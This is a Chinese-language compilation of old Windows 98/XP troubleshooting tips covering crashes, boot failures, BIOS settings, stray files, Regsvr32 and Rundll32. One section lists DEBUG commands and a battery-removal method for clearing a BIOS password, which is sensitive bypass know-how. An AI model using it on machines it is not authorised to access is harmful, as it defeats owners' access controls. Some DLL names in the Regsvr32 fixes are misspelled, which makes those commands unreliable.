    应当之策：配电脑时选配个品牌电源，这样能最大限度的从电源上减小电压波动对硬件造成的不良影响。停电后，关闭所有电源，以防下次来电时显示器和部份ＡＴＸ电源同时启动，这样会造成对硬件的不良损害。当您用WORD编辑文稿时，用上WORD的自动保存功能。如果停电的瞬间恰好您在对磁盘进行操作，建议您下次开机不要在启动时跳过磁盘检测，检测有无产生坏道。一旦发现坏道，则用NORTON，PQMAGIC等工具软件来修复或屏蔽坏道。另外，如果您经济上许可，建议选配一个UPS，为电脑提供一段时间的断电保护。

    自动关机

    现象：电脑在正常运行过程中，突然自动关闭系统或重启系统。

    现象分析：现今的主板对CPU有温度监控功能，一旦CPU温度过高，超过了主板BIOS中所设定的温度，主板就会自动切断电源，以保护相关硬件。另一方面，系统中的电源管理和病毒软件也会导致这种现象发生。

    应当之策：上述突然关机现象如果一直发生，先确认CPU的散热是否正常。开机箱目测风扇叶片是否工作正常，再进入BIOS选项看风扇的转速和CPU的工作温度。发现是风扇的问题，就对风扇进行相关的除尘维护或更换质量更好的风扇。如果排除硬件的原因，进入系统，从“吻到死”的安装光盘中覆盖安装电源管理，再彻底查杀病毒。当这些因素都排除时，故障的起因就可能是电源老化或损坏，这可以通过替换电源法来确认，电源坏掉就换个新的，切不可继续使用，会烧毁硬件的
系统当机

    现象：桌面被锁定，鼠标不能动，严重时连热启动（ALT+CTRL+DEL）都不行。还有就是蓝屏现象。

    现象分析：“吻到死”系统自身的BUG以及各软件间的兼容性问题是该故障的原因，也可能是用户同一时间运行了过多的大程序，从而导致进程阻塞，引发当机。

    应对之策：当机分2种，真当和假当，二者区分的最简单方法是按下小键盘区的Numlock键，观察其指示灯有无变化。有，则假当；反之，真当。假当可以同时按下ALT+CTRL+DEL在出现的任务列表里选定程序名后标注没有响应的项，单击结束任务。真当，只有冷启动了。对于蓝屏，在按下ESC键无效后，选择重启，按机箱面板上的复位键。对于兼容性问题，可以从卸载“问题”软件和更新主板BIOS和相关主板驱动程序上来解决。

    病毒发作

    现象：系统运行缓慢，当机，非法操作，硬盘灯乱闪，经常蓝屏，以及莫名奇妙的系统提示……

    现象分析：病毒实质上是一种恶意的电脑程序代码，病毒通过大量的自身复制，同时在系统中隐秘运行，占有系统资源，严重的还会对软件和硬件造成破坏，如CIH，硬盘锁等。

    应对之策：道高一尺，魔低一丈，病毒的克星是杀毒软件。一旦怀疑自己的机器染上病毒，请重新启动系统到DOS，运行正版的杀毒软件（DOS版）这样可以杀掉在“吻到死”下杀不了的病毒；而后再启动到系统桌面，运行杀毒软件的WINDOWS版本进行再杀毒。另一方面，由于病毒发作严重时会破坏一些文件；我们就在病毒发作之前把重要的文件备份到Ｃ盘之外其它驱动器，且把数据文件的属性设定为只读。同时，大家要时刻更新杀毒软件病毒库，少用盗版碟，已上网的朋友们对不明的邮件附件千万不要下载。

    系统故障

    现象：进不了系统，典型表现为开机自检通过，在启动画面处停止，或显示：The disk is error等有E文提示的诸多现象。

    现象分析：此为系统故障，可由很多原因引起，比较常见的就是系统文件被修改，破坏，或是加载了不正常的命令行。此外，硬盘的故障也是原因之一。

    应对之策：首先要尝试能否进入安全模式，开机按F８键，选择启动菜单里的第三项：Safe model（安全模式）。进入安全模式后，可以通过设备管理器和系统文件检查器来找寻故障，遇到有“！”号的可以查明正身再确定是否del或设置中断。也可以重装驱动程序，系统文件受损可以从安装文件恢复（建议事先就把WINDOWS的安装盘复制在硬盘里）。如果连安全模式都不能进入，就通过带启动的光盘或是软盘启动到DOS，在DOS下先杀毒并且用Dir检查Ｃ盘内的系统文件是否完整，必要时可通过系统软盘进行Sys C:，恢复相关的基本系统文件。如果C盘内没有发现文件，则只有对系统进行彻底重装。
驱动丢失

    现象：开机时16色显示，放音频文件时显示“XXX”设备正被占用。

    现象分析：排除病毒的原因后，这种现象多发生在用过N个月的老机子上，或用户新近动过主机内的部件，（如显卡和PCI卡），则可能造成该硬件的接触不良，导致系统实质上并没有彻底检测到相关硬件。

    应对之策：重新安装显卡的驱动程序，并检查相关配件与主板是否完全接触：一是要保证显卡，声卡金手指上的清洁，二是将其插入相关插槽时用力适当，对准垂直插入即可，再接上与之搭配的音箱和显示器连线。必要时，可以更换PCI卡的插槽位置，避免和显卡产生资源冲突。

    开机黑屏

    现象：开机黑屏，没有显示，可能会有报警声。

    现象分析：硬件之间接触不良，或硬件发生故障，相关的硬件涉及到内存，显卡，CPU，主板，电源等。电脑的开机要先通过电源供电，再由主板的BIOS引导自检，而后通过CPU，内存，显卡等。这个过程反映在屏幕上叫自检，先通过显卡BIOS的信息，再是主板信息，接着内存，硬盘，光驱等。如果这中间哪一步出了问题，电脑就不能正常启动，甚至黑屏。

    应对之策：首先确认外部连线和内部连线是否连接顺畅。外部连线有显示器，主机电源等。内部有主机电源和主机电源接口的连线（此处有时接触不良）。比较常见的原因是：显卡，内存由于使用时间过长，与空气中的粉尘长期接触，造成金手指上的氧化层，从而导致接触不良。对此，用棉花粘上适度的酒精来回擦拭金手指，待干后插回。除此外，观察CPU是否工作正常，开机半分钟左右，用手触摸CPU风扇的散热片是否有温度。有温度，则CPU坏掉的可能性就可基本排除。没温度就整理一下CPU的插座，确保接触到位。这之后还没温度，阁下的CPU就可以升级了：（除了上面的方法外，还有一招必杀技：用拔跳线的方法清除BIOS设置或更换主板的CMOS电池。当这些方法都尝试过并全部失败的话，就可以召唤大虾哥出山相助了。

    怪响异味

    现象：听到怪响或者闻到异味。

    现象分析：怪响，可能是由于硬盘的坏道造成硬盘发出的（格格的刺耳声）；也有可能是硬盘，光驱螺丝没有上牢，造成机箱的共振。异味，多为焦糊味，很刺鼻子的那种。

    应对之策：首先关闭电源。若是怪响，则打开机箱面板，一一检查，若是坏道，则修复或屏蔽。对于异味，要千万小心。这时用你的鼻子闻闻，找到发出异味的部件，然后卸下交由电脑公司处理，在这中间，大家一定要捍卫自己的消费者权益。（没过质保期的--该换的换，该修的修。）这个千万大意不得！因为，笔者的昂达光驱就是闻到焦糊味后断电不及（慢了N秒）给活活烧坏驱动芯片（Firewall）的，而后，再拿钱找JS大叔也没办法。（所以大家如果闻到异味，马上断掉电源，然后再下开机箱寻找原因，但是显示器千万别开，只能交由专业人员维修，那可是有高压电的，千万别拿自己的生命开玩笑。

常见死机原因剖析

大家都知道死机是你在使用计算机过程中最常见的故障之一，而造成死机的原因却扑朔迷离，让人难以捉摸，甚至还一度让你……。在以前dos时代，造成死机原因通常是以病毒为主，当然也有其它方面的原因，如应用软件的设置等等，所以解决死机也就有一定的模式，具体就是先杀毒，检查硬盘空间是不是够用，接着检查autoexec.bat和config.sys文件中是否有错误命令，如果问题还得不到解决，可以检查检查硬件，如此而已。而现在却不同啦，现在是windows时代了，造成死机的原因却是千变万化，所以处理起来相当的棘手。不管咋样，解决死机都是先软后硬，而软件方面当然是先进行杀毒，接着进行一些应用软件、驱动程序等等的安装，你也别忘了注册表的编辑和cmos的一些设置哟，最后教你一招最有效的方法就是将硬盘格掉（开句玩笑而已）。硬件方面主要是散热问题，现在的机子跑得快，当然产生的热量也就多，接着使用最有效的硬件排故障方法--替换法，找出真凶。说了这么多还是具体来谈谈死机，从计算机的启动、运行和关机阶段出现死机现象进行简单的剖析。

    【启动过程中的死机 】
    要分析计算机在启动时出现的死机现象，首先你得清楚计算机系统的启动顺序，从而分析出计算机是因软件问题还是硬件故障引起的死机。所以在这儿有必要简要介绍一下计算机系统的启动顺序：打开计算机电源→检测显卡→检测内存→执行bios→检测其它设备（cpu、硬盘等等设备）→执行操作系统（os）的初始化文件。而操作系统的启动过程就比较复杂一些，首先是将rom（只读存储器）中的bootstrap loader程序和自诊断程序转送到ram（随机存储器）中，随着bootstrap loader的运行，操作系统的系统文件也将装载到ram中，接着执行io.sys和msdos.sys这两个系统文件，此时计算机显示器上将出现“starting windows 98……”画面，最后初始化system.ini和win.ini，读取注册表文件。到此如果没有任何问题，就会成功的启动计算机系统。下面就介绍一下在这一过程中出现的死机现象。
    开机后计算机系统无任何反应：如果电源没有启动，看看电源线是不是没有连接好，连好电源线无任何好转，故障可能是电源有问题，更换电源试试。
    开机后计算机显示器无任何反应，且伴随有1长2短报警声音后死机：首先排除了是显示器故障，因为即使显示器有故障是不会引起计算机死机的，这种情况多半是由于显示卡没有插到位或是松动了，打开机箱重新安装一下显示卡，或者换一个插槽试一试，这样问题即可解决。
    显示器出现短暂的显示适配器信息，且伴随有1长1短的警报声音后死机：既然出现了显示适配器信息，则说明显示适配器没问题，这种情况往往是内存存在故障，解决的方法是打开机箱重新安装一下内存条试一试，如果还不行的话，换一条内存条试一试，当然你一定要好好地仔细地看看扩展槽是不是完好，这样肯定能够排除这一故障。
    bios升级失败后的死机：找出同型号bios主板的计算机，在这计算机上将bios程序备份出来，利用bios刷新程序将其刷新即可，前提是bios能够进行刷新。
    cmos设置不当造成的死机：这个故障就非常之多，在此仅举常见的例子，如硬盘参数设置不当或模式设置不当导致计算机无法启动，内存参数设置不当，如没有ecc功能的内存将其设为具有ecc功能，这样常常会因内存错误而造成计算机死机，等等许多例子，用户只须将设置修正过来即可。
    计算机超频后启动计算机死机:现在超频对广大计算机用户来说是一个非常时尚的话题，时不时的就对计算机进行超频，尤其是现在许多主板生产商将超频放在cmos中，这样diy 们别提有多高兴，因为超频更方便快捷，但是超频有极限吗？不得而知，如果是超频后在重新启动计算机过程中死机的话，那就是你的超频太高啦，需要降低一些。
       系统文件的误删或错误造成计算机无法启动而呈现死机状态:由于windows启动需要command.com、io.sys、msdos.sys和drvspace.bin四个文件，如果这些文件遭破坏或者被误删了的话，即使在cmos中各种硬件设置正确无误，也是无济于事，肯定系统无法启动，解决问题的方法只有用软盘启动计算机（当然是系统版本相同的系统盘），然后键入 sys c：即可。
       初始化文件遭破坏致使计算机无法启动而呈现死机状态:由于windows启动需要读取system.ini、win.ini和注册表文件（user.dat、system.dat），如果存在有config.sys和 autoexec.bat文件当然也是要读取的，只要这些文件中存在错误信息都可能出现死机现象，特别是system.ini、win.ini、user.dat和system.dat这四个文件尤为重要，只要有一丁点错误系统将无法启动，为此笔者强烈建议用户平时一定要对这四个文件进行备份。

    【运行过程中的死机】
    运行时死机是指我们在使用windows的过程中出现的死机情况，也就是说在windows操作平台下运行一些应用程序而无怨无故的出现死机现象。这种现象一些是应用程序与操作系统之间存在冲突，一些是应用程序本身就有bug等等，下面就对运行中出现的死机现象加以说明。
    运行某些应用程序时出现的死机现象：造成这种故障的原因大致有三种可能，一是应用程序被病毒感染，再就是应用程序本身存在bug，还有就是应用程序与操作系统之间存在一些冲突。
    资源不足造成的死机：在使用过程中打开应用程序过多，占用了大量的系统资源，致使在使用过程中出现的资源不足现象，因此在使用比较大型的应用软件时，最好少打开与本应用程序无关的软件。
    硬盘剩余空间太少或者是碎片太多造成的死机：如果硬盘的剩余空间太少，由于一些应用程序运行需要大量的内存，这样就需要虚拟内存，而虚拟内存则是硬盘所赋予的，所以硬盘要有足够的剩余空间以满足虚拟内存的需求；还有就是我们要养成定期定时整理硬盘的习惯。
    一些文件被覆盖而造成运行一些应用程序死机现象：在安装新的应用程序时出现一些文件覆盖提示，笔者建议你最好不对任何文件进行覆盖操作，否则可能造成运行一些应用出现死机现象（预防）。
    一些文件被删除而造成运行一些应用程序死机现象：在我们卸载一些应用程序时往往会出现对某些文件是否删除的提示，如果你不是特别清楚该文件与其它文件有无关系的话，最好不要将其删除，否则可能造成运行某些应用程序因缺少某些文件而出现死机现象，甚至于造成整个系统崩溃的惨状（预防）。
    程序运行后鼠标键盘均无反应：应用程序运行后死机，说明该应用程序没有正常结束运行，一直占用着系统资源，而操作系统不清楚这情况。结束应用程序只有实施强制手段，即同时按住ctrl、alt和del键，结束任务即可。
    设置省电功能导致显示器频繁黑屏死机：一般是由于在bios中将节能时间设置过短，或者是在屏幕保护程序中设置的时间太短。
    硬件超频造成运行中的死机：超频后计算机能够启动，说明超频是成功的，为什么运行会出现死机呢？一般是由于超频后硬件产生大量的热量无法及时地散发而造成的死机现象，所以往往我们超频的同时也要对散热装置进行合理的改善。
    硬件方面：计算机硬件配置太低、内存速度不匹配（死机现象：鼠标可以移动，点击无反应）、中断设置造成硬件之间的冲突、各种驱动程序不相匹配等等也可能造成在运行中死机的现象。


电脑维精华帖

《一键清理系统垃圾》

电脑维精华帖

何时要对BIOS或CMOS进行设置？

    众所周知，进行BIOS或CMOS设置是由操作人员根据微机实际情况而人工完成的一项十分重要的系统初始化工作。在以下情况下，必须进行BIOS或CMOS进行设置：

    1、新购微机

    即使带PnP功能的系统也只能识别一部分微机外围设备，而对软硬盘参数、当前日期、时钟等基本资料等必须由操作人员进行设置，因此新购买的微机必须通过进行CMOS参数设置来告诉系统整个微机的基本配置情况。

    2．新增设备

    由于系统不一定能认识新增的设备，所以必须通过CMOS设置来告诉它。另外，一旦新增设备与原有设备之间发生了IRQ、DMA冲突，也往往需要通过BIOS设置来进行排除。

    3．CMOS数据意外丢失

    在系统后备电池失效、病毒破坏了 CMOS数据程序、意外清除了CMOS参数等情况下，常常会造成CMOS数据意外丢失。此时只能重新进入BIOS设置程序完成新的CMOS参数设置。

    4．系统优化

    对于内存读写等待时间、硬盘数据传输模式、内／外 Cache的使用、节能保护、电源管理、开机启动顺序等参数， BIOS中预定的设置对系统而言并不一定就是最优的，此时往往需要经过多次试验才能找到系统优化的最佳组合。

打开机箱，找到主板上的电池，将其与主板的连接断开（就是取下电池喽），此时CMOS将因断电而失去内部储存的一切信息。再将电池接通，合上机箱开机，由于CMOS已是一片空白，它将不再要求你输入密码，此时进入BIOS设置程序，选择主菜单中的"LOAD BIOS DEFAULT"（装入BIOS缺省值）或"LOAD SETUP DEFAULT"（装入设置程序缺省值）即可，前者以最安全的方式启动计算机，后者能使你的计算机发挥出较高的性能。

妙用DEBUG清除CMOS密码

如果你忘记了进入CMOS设置程序的密码，除了可以在主板上使用跳线短接清除的方法外，还可以使用软件清除的方法，下面就来介绍如何在DOS下清除CMOS密码的方法。

在DOS中提供了一个编辑器，就是DEBUG，这是一个非常实用的工具，启动方法是，在DOS命令提示符状态下输入命令：DEBUG、此时即可进入DEBUG编辑界面。

在命令符状态下输入命令后，重新启动电脑即可清除CMOS密码，下面给出五个清除CMOS密码的命令行。

方法一
-o 70 16
-o 71 16
-q
方法二
-o 70 11
-o 71 ff
-q
方法三
-o 70 10
-o 71 10
-q
方法四
-o 70 23
-o 71 34
-q
方法五
-o 70 10
-o 71 ff
-q

方法六
-o 70 90
-o 71 91
-q

在DOS下安装Win XP

    在Win 98的DOS状态下可以安装Win XP，插入Win XP光盘后，首先从开始中进入MS-DOS，然后在MS-DOS下输入“G:\Setup.exe”(G为光驱盘符)即可。

    如果想从纯DOS下进行安装，可用启动盘启动到DOS状态，安装时首先加载Smartdrv.exe(将Win 98安装光盘或Win 98系统的Windows目录中的Smartdrv.exe拷贝到启动盘上，在DOS提示符下执行Smartdrv.exe即可加载)，然后运行/i386目录下的winnt.exe即可。

在DOS中使用系统还原工具

    在系统上电自检声响后，Windows欢迎屏幕出现之前按下F8键，接着在菜单中选择Safe Mode with Command Prompt，然后使用管理员身份登录，在命令行提示符后输入：%systemroot%\ system32\restore\rstrui.exe，回车后跟随屏幕上的向导将系统恢复到以前的正常状态。

Explorer.exe程序在系统中的作用

凡是Windows系列的操作系统，运行时都会启动一个名为Explorer.exe的进程。这个进程主要负责显示系统桌面上的图标以及任务栏，它在不同的系统中有不同的妙用。

    Windows 9x中的应用

    在Windows 9x中，这个进程是运行系统时所必需的。如果用“结束任务”的方法来结束Explorer.exe进程，系统就会刷新桌面，并更新注册表。所以，我们也可以利用此方法来快速更新注册表。方法如下：

    按下Ctrl+Alt+Del组合键，出现“结束任务”对话框。在该对话框中选择“Explorer”选项，然后单击“结束任务”按钮，将出现“关闭Windows”对话框。单击“否”按钮，系统过一会儿将出现另一个对话框，告诉你该程序没有响应，询问是否结束任务。单击“结束任务”按钮，则更新注册表并返回Windows 9x系统环境中。这比起烦琐的重新启动过程要方便多了？

    Windows 2000/XP中的应用

在Windows 2000/XP和其他Windows NT内核的系统中，Explorer.exe进程并不是系统运行时所必需的，所以可以用任务管理器来结束它，并不影响系统的正常工作。打开你需要运行的程序，如记事本。然后右击任务栏，选择“任务管理器”，选中“进程”选项卡，在窗口中选择Explorer.exe进程，单击“结束进程”按钮，，接下来桌面上除了壁纸(活动桌面Active Desktop的壁纸除外)，所有图标和任务栏都消失了。此时你仍可以像平常一样操作一切软件。

如果你想运行其他软件，但此时桌面上空无一物，怎么办？别着急，下面有两种可以巧妙地打开其他软件：

    第一种方法：按下Ctrl+Alt+Del组合键，出现“Windows安全”对话框，单击“任务管理器”按钮(或是直接按下Ctrl+Shift+Esc组合键)，在任务管理器窗口中选中“应用程序”选项卡，单击“新任务”，在弹出的“创建新任务”的对话框中，输入你想要打开的软件的路径和名称即可。

    你还可以在正在运行的软件上，选择“文件→打开”，在“打开”对话框中，点击“文件类型”下拉列表，选择“所有文件”，再浏览到你想打开的软件，右击它，在快捷菜单中选择“打开”命令，就可以启动你需要的软件了。注意，此时不能够通过单击“打开”按钮来打开软件，此种方法适用于大多数软件，Office系列除外。
通过结束Explorer.exe进程，还可以减少4520KB左右的系统已使用内存，无疑会加快系统的运行速度，为资源紧张的用户腾出了宝贵的空间。

    提示：重新启动Explorer.exe进程后，有些软件在任务栏系统托盘的小图标会消息，但该软件还是在正常运行当中。如果觉得有些不方便，可以再次打开该软件来显示小图标。

folder.htt等文件的问题

Q12.2：最近在我的电脑的所有文件夹中出现了这样两个文件esktop.ini、folder.htt，怎么也删不去。有人说是病毒，把系统和别的分区全格式化了就好了。可是我的东西全都有用，不能格式化的，请问怎么办？

    A：你的电脑可能是感染了VBS.KJ脚本病毒。该病毒采用VBScript语言编写，在互联网上通过电子邮件进行传播，也可以通过文件感染；感染后的机器系统资源被大量消耗，速度变慢；利用Windows系统的“资源管理器”进行寄生与感染。在每个检查到的文件夹下生成desktop.ini和folder.htt文件(隐藏属性)。并且，该病毒还会修改注册表的许多键值。手工删除比较困难，建议采用杀毒软件杀毒，这样可以避免格式化你的硬盘，保护你的数据。金山公司反病毒应急处理中心的《新欢乐时光》专杀工具效果比较好，并提供免费下载，下载链接ftp://www.iduba.net/download/othertools/scanvbskj.exe大小仅56KB！

found.000文件夹的问题

问：我的电脑有的时候在C盘或D盘的根目录下有个名为found.000的文件夹，里面有一些后缀名为CHK的文件。在c:\windows下有很多以fff开头的怪文件，而且大小全部为0字节。请问这些是什么文件？能否将它们删除？

    答：found.000文件夹里面的一些后缀名为CHK的文件是你在使用“磁盘碎片整理程序”整理硬盘后所产生的“丢失簇的恢复文件”。在c:\windows下有很多以fff开头的文件是由Mdm.exe(Machine Debug Manager)这个程序产生的。Mdm.exe的主要工作是针对应用软件进行排错(Debug)，在排错过程中会产生一些暂存文件，这些文件在操作系统进行关机时没有自动被清除，所以这些fff开头的怪文件和found.000文件夹里面的一些后缀名为CHK的文件都是没有用的垃圾文件，可以任意删除而不会对系统产生不良影响。

    但只要系统中有Mdm.exe存在，那么以fff开头的怪文件就又有可能产生。你可以按下面的方法让系统停止运行Mdm.exe来彻底删除以fff开头的怪文件：首先按“Ctrl+Alt+Del”组合键，在弹出的“关闭程序”窗口中选中“Mdm”，按“结束任务”按钮来停止Mdm.exe在后台的运行，接着把Mdm.exe(在C:\Windows\System目录下)改名为Mdm.bak。运行msconfig程序，在启动页中取消对“Machine Debug Manager”的选择。这样可以不让Mdm.exe自启动，然后点击“确定”按钮，结束msconfig程序，并重新启动电脑。另外，如果你使用IE 5.X，建议禁用脚本调用(点击“工具→Internet选项→高级→禁用脚本调用”)，这样就可以避免以fff开头的怪文件再次产生。

让IE以最大化显示
    问：我使用的操作系统是Windows 2000，上网一段时间后，突然发觉IE无法以最大化显示，把IE重装一遍后，也无法解决这个问题，请问我该怎么办？

    答：在“运行”中输入regedit打开注册表编辑器，选择“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\”，在右边的窗口中删除“Window_Placement”键，在 “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old Work-Areas”右边窗口中删除“OldWorkAreaRects”键。关闭注册表编辑器，重新启动计算机，连续两次最大化IE窗口(即“最大化→还原→最大化”)，再次重新启动IE就可以了。

Mfm1992文件问题

    问：我的桌面上出现了一个名为Mfm1992的视窗图案的图标，路径是C:\Windows\Desktop，占用45056字节，请问它是什么文件？

    答：“Mfm1992”是中文输入法“智能ABC”的记录文件。你的电脑中出现“Mfm1992”文件是由于你使用了“智能ABC”输入法作为中文录入的方式，这也应该算是“智能ABC”输入法的一个Bug，该文件可以随时删除而不会影响系统，不必担心。

Regsvr32 用法和错误消息的说明

对于那些可以自行注册的对象链接和嵌入 (OLE) 控件，例如动态链接库 (DLL) 文件或 ActiveX 控件 (OCX) 文件，您可以使用 Regsvr32 工具 (Regsvr32.exe) 来将它们注册和取消注册。

Regsvr32.exe 的用法

RegSvr32.exe 具有以下命令行选项： Regsvr32 [/u] [/n] [/i[:cmdline]] dllname

   /u - Unregister server<BR/>
   /i - Call DllInstall passing it an optional [cmdline];
        when used with /u calls dll uninstall
   /n - do not call DllRegisterServer; this option must
        be used with /i

当您使用 Regsvr32.exe 时，它会尝试加载该组件并调用它的 DLLSelfRegister 函数。如果此尝试成功，Regsvr32.exe 会显示一个指示成功的对话框。如果此尝试失败，Regsvr32.exe 会返回一条错误消息，其中可能会包括一个 Win32 错误代码。要查看 Win32 错误代码的列表，请参见下面的 Microsoft Web 站点：
http://msdn.microsoft.com/library/en-us/netdir/adsi/win32_error_codes.asp

例如，要手动注册 Sample.ocx ActiveX 控件，请在 MS-DOS 提示符处键入以下命令：
c:\regsvr32.exe sample.ocx

Regsvr32.exe 错误消息

以下列表介绍了 RegSvr32 错误消息和可能的原因。

Unrecognized flag:/invalid_flag

键入的标志或开关组合无效（请参阅本文中的“Regsvr32.exe 的用法”一节）。

No DLL name specified.

未包括 .dll 文件名（请参阅本文中的“Regsvr32.exe 的用法”一节）。

Dllname was loaded, but the DllRegisterServer or DllUnregisterServer entry point was not found.

Dllname 不是 .dll 或 .ocx 文件。例如，键入 regsvr32 wjview.exe 就会生成该错误消息。

Dllname is not an executable file and no registration helper is registered for this file type.

Dllname 不是可执行文件（.exe、.dll 或 .ocx）。例如，键入 regsvr32 autoexec.bat 就会生成该错误消息。

Dllname was loaded, but the DllRegisterServer or DllUnregisterServer entry point was not found.

Dllname 可能未导出，或者内存中可能有损坏的 Dllname 版本。请考虑使用 Pview 来检测该文件并删除它。

Dllname is not self-registerable or a corrupted version is in memory.

例如，键入 regsvr32 icwdial.dll 后就会返回该错误消息，因为 Icwdial.dll 文件不能自行注册。如果您怀疑内存中有损坏的 Dllname 版本，请尝试重新启动计算机，或重新提取该文件的原始版本。如果您运行的是 Windows NT，可能需要使用 Microsoft Windows NT Server 4.0 资源工具包 中的 Kill 或 Pview 工具。有关其他信息，请单击以查看以下 Microsoft 知识库文章：
197155 如何终止孤立进程

OleInitialize failed (or OleUninitialize failed).

Regsvr32 必须先初始化 COM 库，然后才能调用所需的 COM 库函数并在关闭时撤消对该库的初始化。如果对 COM 库进行初始化或撤消初始化的尝试失败，就会出现这些错误消息。例如，Ole32.dll 文件可能已经损坏，或者其版本有误。

LoadLibrary("Dllname") failed.GetlastError returns 0x00000485

在 Winerror.h 中，0x00000485 = 1157 (ERROR_DLL_NOT_FOUND)，表示“找不到运行该应用程序所需的某个库文件”。例如，键入 regsvr32 missing.dll 后，如果找不到 Missing.dll 文件，就会返回该错误消息。

LoadLibrary("Dllname") failed.GetLastError returns 0x00000002

在 Winerror.h 中，0x00000002 = 2 (ERROR_FILE_NOT_FOUND)，表示“系统找不到指定的文件”。换言之，系统找不到相关的 DLL。例如，如果键入 regsvr32 icwdial.dll，而此时缺少 Tapi32.dll（依赖项），就会返回该错误消息。

LoadLibrary("dskmaint.dll") failed.GetLastError returns 0x000001f

在 Winerror.h 中，0x000001f = 31 (ERROR_GEN_FAILURE)，表示“附加到系统上的设备不能正常工作”。如果您尝试注册 Win16 .dll 文件，就会发生此现象。例如，键入 regsvr32 dskmaint.dll 会返回该错误消息。

DllRegisterServer (or DllUnregisterServer)in Dllname failed.返回代码是：字符串

在 Winerror.h 中搜索字符串。
Regsvr32.exe 和依赖项
RegSvr32.exe 依赖于 Kernel32.dll、User32.dll 和 Ole32.dll 文件（在 Windows NT 中，还依赖于 Msvcrt.dll 和 Advapi32.dll 文件）。Regsvr32.exe 会加载您尝试注册或撤消注册的文件及其所有依赖项。如果缺少必需的文件或者它们已损坏，该进程可能会失败。

您可以使用 Depends.exe 来确定您尝试注册或撤消注册的文件的依赖项。在 Microsoft Windows 98 资源工具包 和 Microsoft Windows NT 4.0 资源工具包 支持工具中都提供了 Depends.exe。
247024 Tools Included with the Microsoft Windows 98 Resource Kit

Regsvr32使用方法

    使用过activex的人都知道，activex不注册是不能够被系统识别和使用的，一般安装程序都会自动地把它所使用的activex控件注册，但如果你拿到的一个控件需要手动注册怎么办呢？如果修改注册表那就太麻烦了，在windows的system文件夹下有一个regsvr32.exe的程序，它就是windows自带的activex注册和反注册工具。它的用法为：

    “regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为activex控件文件名，建议在安装前拷贝到system文件夹下。

    参数有如下意义：

    /u--反注册控件

    /s--不管注册成功与否，均不显示提示框

    /c--控制台输出

    /i--跳过控件的选项进行安装(与注册不同)

    /n--不注册控件，此选项必须与/i选项一起使用

Regsvr32命令修复系统故障

Regsvr32命令是 Windows 系统提供的一个实用工具，它用来向系统注册控件或者卸载控件，利用该命令，可找回系统丢失的功能。Regsvr32命令以命令行方式运行，其命令格式为： Regsvr32 [/u] Filename, Filename是控件文件名，不带参数 u 就是注册控件，带参数 u 就是卸载控件。
l. 恢复图片预览功能： Windows XP的图片预览功能，对应的控件文件为 thurnbvw.dll。 如果该功能损坏，可单击“开始”一“运行” , 在“打开”框中输人：" Regsvr32 Thurnbvw. dll" ，单击“确定”执行命令，这时就会弹出提示框： " DllRegisterServer in Thumbvw.dll succeeded." ，这表明控件注册成功。重新启动电脑，WindowsXP 的图片预览功能便恢复了。
    2. 恢复ZIP功能：Windows XP 系统提供了ZIP功能，虽然功能不算强大，但不需要第三方软件就可打开ZIP文件，而且可以把ZIP压缩文件当作文件夹使用，也算是比较方便、实用的功能。如果该功能损坏，可在运行框中执行“Regsvr32 ZIPfldr.dll”命令，然后重新启动电脑即可恢复。
3. 恢复IE新窗口打开超级链接功能：在IE中有两种超级链接，一种是在当前页面跳转的链接，另一种是弹出新窗口的链接，对第一种链接也可按住Shift键在新窗口中打开。很多人都遇到过不能在新窗口打开链接的麻烦事儿，这个问题也是因控件注册信息丢失引起的。解决办法是：在运行框中分别执行三个命令：“Regsvr32 Actxprxy.dll ”、“Regsvr32 Shdocvw.dll”、 " Regsvr32 Oleaut32.dll ”。一这三个控件注册成功后，重新启动电脑， IE 就恢复正常了。
    4. 恢复FSO功能：现在有很多人利用自己的电脑建论坛、网站，论坛或者动态网站程序都可进行在线文件管理，管理员通过页面就可操作文件，但经常有人反映自己的论坛、网站不能在线管理文件，这是因为服务器的FSO功能没有开通或者出现故障，解决办法是：在服务器的运行框中执行“Regsvr32 Sorrun.dll " ，最后重启服务器即可开通／恢复FSO功能。
    5. 恢复在线升级功能：在Windows的“开始”菜单的顶端，有一个“Windows Update”项，可以快捷的对系统进行在线升级打补。但有时会发现无法进行在线升级，要解决这个故障，只要在运行框中执行 " Regsvr32 Wupdinfo.dll " ，重启电脑即可解决。

RUNDLL32.EXE 是什么程序

    Rundll32.exe是什么？顾名思意，“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数，这样在进程当中，只会有Rundll32.exe，而不会有DLL后门的进程，这样，就实现了进程上的隐藏。如果看到系统中有多个Rundll32.exe，不必惊慌，这证明用Rundll32.exe启动了多少个的DLL文件。当然，这些Rundll32.exe执行的DLL文件是什么，我们都可以从系统自动加载的地方找到。

    现在，我来介绍一下Rundll32.exe这个文件，意思上边已经说过，功能就是以命令行的方式调用动态链接程序库。系统中还有一个Rundll.exe文件，他的意思是“执行16位的DLL文件”，这里要注意一下。在来看看Rundll32.exe使用的函数原型：
    Void CALLBACK FunctionName (
    HWND hwnd,
    HINSTANCE hinst,
    LPTSTR lpCmdLine,
    Int nCmdShow
    );

    其命令行下的使用方法为：Rundll32.exe DLLname,Functionname [Arguments]
    DLLname为需要执行的DLL文件名；Functionname为前边需要执行的DLL文件的具体引出函数；[Arguments]为引出函数的具体参数。
略谈Rundll32.exe的作用　(我是菜鸟)

    常用Windows9x的朋友一定对Rundll32.exe和Rundll.exe这两个档案不会陌生吧，不过,由於这两个程式的功能原先只限於在微软内部使用，因而真正知道如何使用它们的朋友想必不多。那么好，如果你还不清楚的话，那么就让我来告诉你吧。
    首先，请你做个小实验（请事先保存好你正在执行的程式的结果，否则...）：点击“开始－程式－Ms－Dos方式”，进入Dos视窗，然後键入rundll32.exe user.exe,restartwindows，再按下回车键，这时你将看到，机器被重启了！怎么样，是不是很有趣？
     当然，Rundll的功能绝不仅仅是重启你的机器。其实，Rundll者，顾名思义，执行Dll也，它的功能就是以命令列的方式呼叫Windows的动态链结库，Rundll32.exe与Rundll.exe的区别就在於前者是呼叫32位的链结库，而後者是运用於16位的链结库，它们的命令格式是：

     RUNDLL.EXE ，，
